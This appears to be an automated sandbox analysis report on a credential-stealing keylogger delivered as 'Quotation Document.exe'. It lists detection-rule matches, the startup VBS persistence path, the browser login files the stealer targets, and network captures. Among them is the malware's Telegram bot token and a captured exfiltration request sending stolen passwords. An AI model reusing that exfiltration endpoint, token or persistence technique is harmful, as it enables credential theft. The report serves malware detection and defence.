7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c8a0:$a1: get_encryptedPassword 0x1c874:$a2: get_encryptedUsername 0x1c938:$a3: get_timePasswordChanged 0x1c850:$a4: get_passwordField 0x1c8b6:$a5: set_encryptedPassword 0x1c683:$a7: get_logins 0x1bbf1:$a8: GetOutlookPasswords 0x1b105:$a9: StartKeylogger 0x19b5f:$a10: KeyLoggerEventArgs 0x19b2e:$a11: KeyLoggerEventArgsEventHandler 0x1c757:$a13: _encryptedPassword
7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20f9b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20499:$a3: \Google\Chrome\User Data\Default\Login Data 0x207a7:$a4: \Orbitum\User Data\Default\Login Data 0x2159f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.3c55570.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d788:$a1: get_encryptedPassword 0x45ac0:$a1: get_encryptedPassword 0x1d75c:$a2: get_encryptedUsername 0x45a94:$a2: get_encryptedUsername 0x1d820:$a3: get_timePasswordChanged 0x45b58:$a3: get_timePasswordChanged 0x1d738:$a4: get_passwordField 0x45a70:$a4: get_passwordField 0x1d79e:$a5: set_encryptedPassword 0x45ad6:$a5: set_encryptedPassword 0x1d56b:$a7: get_logins 0x458a3:$a7: get_logins 0x1cad9:$a8: GetOutlookPasswords 0x44e11:$a8: GetOutlookPasswords 0x1bfed:$a9: StartKeylogger 0x44325:$a9: StartKeylogger 0x1aa47:$a10: KeyLoggerEventArgs 0x42d7f:$a10: KeyLoggerEventArgs 0x1aa16:$a11: KeyLoggerEventArgsEventHandler 0x42d4e:$a11: KeyLoggerEventArgsEventHandler 0x1d63f:$a13: _encryptedPassword
7.2.RegSvcs.exe.5090000.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f19b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e699:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e9a7:$a4: \Orbitum\User Data\Default\Login Data 0x1f79f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2831ae6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f19b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e699:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e9a7:$a4: \Orbitum\User Data\Default\Login Data 0x1f79f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.3c7e790.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c8a0:$a1: get_encryptedPassword 0x1c874:$a2: get_encryptedUsername 0x1c938:$a3: get_timePasswordChanged 0x1c850:$a4: get_passwordField 0x1c8b6:$a5: set_encryptedPassword 0x1c683:$a7: get_logins 0x1bbf1:$a8: GetOutlookPasswords 0x1b105:$a9: StartKeylogger 0x19b5f:$a10: KeyLoggerEventArgs 0x19b2e:$a11: KeyLoggerEventArgsEventHandler 0x1c757:$a13: _encryptedPassword
7.2.RegSvcs.exe.3c7e790.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20f9b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20499:$a3: \Google\Chrome\User Data\Default\Login Data 0x207a7:$a4: \Orbitum\User Data\Default\Login Data 0x2159f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.5090000.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c8a0:$a1: get_encryptedPassword 0x1c874:$a2: get_encryptedUsername 0x1c938:$a3: get_timePasswordChanged 0x1c850:$a4: get_passwordField 0x1c8b6:$a5: set_encryptedPassword 0x1c683:$a7: get_logins 0x1bbf1:$a8: GetOutlookPasswords 0x1b105:$a9: StartKeylogger 0x19b5f:$a10: KeyLoggerEventArgs 0x19b2e:$a11: KeyLoggerEventArgsEventHandler 0x1c757:$a13: _encryptedPassword
7.2.RegSvcs.exe.2ba0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1aaa0:$a1: get_encryptedPassword 0x1aa74:$a2: get_encryptedUsername 0x1ab38:$a3: get_timePasswordChanged 0x1aa50:$a4: get_passwordField 0x1aab6:$a5: set_encryptedPassword 0x1a883:$a7: get_logins 0x19df1:$a8: GetOutlookPasswords 0x19305:$a9: StartKeylogger 0x17d5f:$a10: KeyLoggerEventArgs 0x17d2e:$a11: KeyLoggerEventArgsEventHandler 0x1a957:$a13: _encryptedPassword
7.2.RegSvcs.exe.3c55570.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21e83:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a1bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21381:$a3: \Google\Chrome\User Data\Default\Login Data 0x496b9:$a3: \Google\Chrome\User Data\Default\Login Data 0x2168f:$a4: \Orbitum\User Data\Default\Login Data 0x499c7:$a4: \Orbitum\User Data\Default\Login Data 0x22487:$a5: \Kometa\User Data\Default\Login Data 0x4a7bf:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2ba0ee8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f19b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e699:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e9a7:$a4: \Orbitum\User Data\Default\Login Data 0x1f79f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2ba0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d788:$a1: get_encryptedPassword 0x1d75c:$a2: get_encryptedUsername 0x1d820:$a3: get_timePasswordChanged 0x1d738:$a4: get_passwordField 0x1d79e:$a5: set_encryptedPassword 0x1d56b:$a7: get_logins 0x1cad9:$a8: GetOutlookPasswords 0x1bfed:$a9: StartKeylogger 0x1aa47:$a10: KeyLoggerEventArgs 0x1aa16:$a11: KeyLoggerEventArgsEventHandler 0x1d63f:$a13: _encryptedPassword
7.2.RegSvcs.exe.5090000.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20f9b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20499:$a3: \Google\Chrome\User Data\Default\Login Data 0x207a7:$a4: \Orbitum\User Data\Default\Login Data 0x2159f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2ba0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21e83:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21381:$a3: \Google\Chrome\User Data\Default\Login Data 0x2168f:$a4: \Orbitum\User Data\Default\Login Data 0x22487:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.3c56458.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.3c56458.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3c56458.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.3c56458.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c56458.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c8a0:$a1: get_encryptedPassword 0x44bd8:$a1: get_encryptedPassword 0x1c874:$a2: get_encryptedUsername 0x44bac:$a2: get_encryptedUsername 0x1c938:$a3: get_timePasswordChanged 0x44c70:$a3: get_timePasswordChanged 0x1c850:$a4: get_passwordField 0x44b88:$a4: get_passwordField 0x1c8b6:$a5: set_encryptedPassword 0x44bee:$a5: set_encryptedPassword 0x1c683:$a7: get_logins 0x449bb:$a7: get_logins 0x1bbf1:$a8: GetOutlookPasswords 0x43f29:$a8: GetOutlookPasswords 0x1b105:$a9: StartKeylogger 0x4343d:$a9: StartKeylogger 0x19b5f:$a10: KeyLoggerEventArgs 0x41e97:$a10: KeyLoggerEventArgs 0x19b2e:$a11: KeyLoggerEventArgsEventHandler 0x41e66:$a11: KeyLoggerEventArgsEventHandler 0x1c757:$a13: _encryptedPassword
7.2.RegSvcs.exe.3c56458.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20f9b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x492d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20499:$a3: \Google\Chrome\User Data\Default\Login Data 0x487d1:$a3: \Google\Chrome\User Data\Default\Login Data 0x207a7:$a4: \Orbitum\User Data\Default\Login Data 0x48adf:$a4: \Orbitum\User Data\Default\Login Data 0x2159f:$a5: \Kometa\User Data\Default\Login Data 0x498d7:$a5: \Kometa\User Data\Default\Login Data
Click to see the 93 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , ProcessId: 2000, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , ProcessId: 2000, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\emboweling\neophobia.exe, ProcessId: 7760, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T00:37:15.917486+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49730	TCP
2024-11-01T00:37:55.525342+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49736	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T00:38:46.434821+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49826	193.122.6.168	80	TCP
2024-11-01T00:38:52.887926+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49826	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI", "Telegram Chatid": "5679778644"}
Source: RegSvcs.exe.8080.7.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: Quotation Document.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Quotation Document.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Quotation Document.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49827 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49828 version: TLS 1.2

Source:

Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_0293E278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050F504Fh	7_2_050F4C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050F48F9h	7_2_050F4648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050FF799h	7_2_050FF4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050F504Fh	7_2_050F4F7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050FFBF1h	7_2_050FF948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050FF341h	7_2_050FF098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	7_2_064D5C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	7_2_064D2B2C

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77 HTTP/1.1Content-Type: multipart/form-data; boundary================8dcf9e3a617256dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49826 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49827 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77 HTTP/1.1Content-Type: multipart/form-data; boundary================8dcf9e3a617256dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000007.00000002.2906364224.0000000005412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.s
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77l

Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49828 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
